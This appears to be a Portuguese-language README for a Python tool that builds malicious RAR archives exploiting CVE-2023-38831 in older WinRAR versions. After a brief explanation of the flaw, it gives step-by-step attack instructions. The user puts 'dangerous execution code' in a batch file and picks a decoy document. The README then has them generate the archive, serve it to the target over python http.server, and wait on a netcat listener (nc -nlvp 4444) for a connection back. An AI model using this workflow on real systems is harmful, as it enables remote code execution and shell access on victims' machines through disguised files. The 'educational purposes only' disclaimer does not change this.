
Gera um arquivo RAR malicioso explorando CVE-2023-38831 no WinRAR para executar código arbitrário quando um usuário abre um arquivo benigno, com um gerador de exploração baseado em Python e configuração de ouvinte.
⚠️ Apenas para fins educacionais e de pesquisa de segurança autorizada
Muito grato ao autor original do PoC b1tg e à Group-IB Threat Intelligence
O WinRAR da RARLAB antes da versão 6.23 permite que atacantes executem código arbitrário quando um usuário tenta visualizar um arquivo benigno dentro de um arquivo ZIP.

O problema ocorre porque um arquivo ZIP pode incluir um arquivo benigno (como um arquivo .JPG comum) e também uma pasta que tem o mesmo nome do arquivo benigno, e o conteúdo da pasta (que pode incluir conteúdo executável) é processado durante uma tentativa de acessar apenas o arquivo benigno. Isso foi explorado ativamente entre abril e agosto de 2023.

Primeiro, modifique o arquivo script.bat com seu código de execução perigoso
Insira o arquivo isca, é recomendado que seja uma imagem (.png, jpg) ou um documento (.pdf)
Execute o comando para gerar o arquivo de exploit
python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat poc.rar
Envie o arquivo de exploit para a máquina alvo usando python http.server, por exemplo:
python -m http.server
Configure o Listener na sua máquina atacante:
nc -nlvp 4444
Baixe e abra o arquivo de exploit com o WinRAR anterior à versão 6.23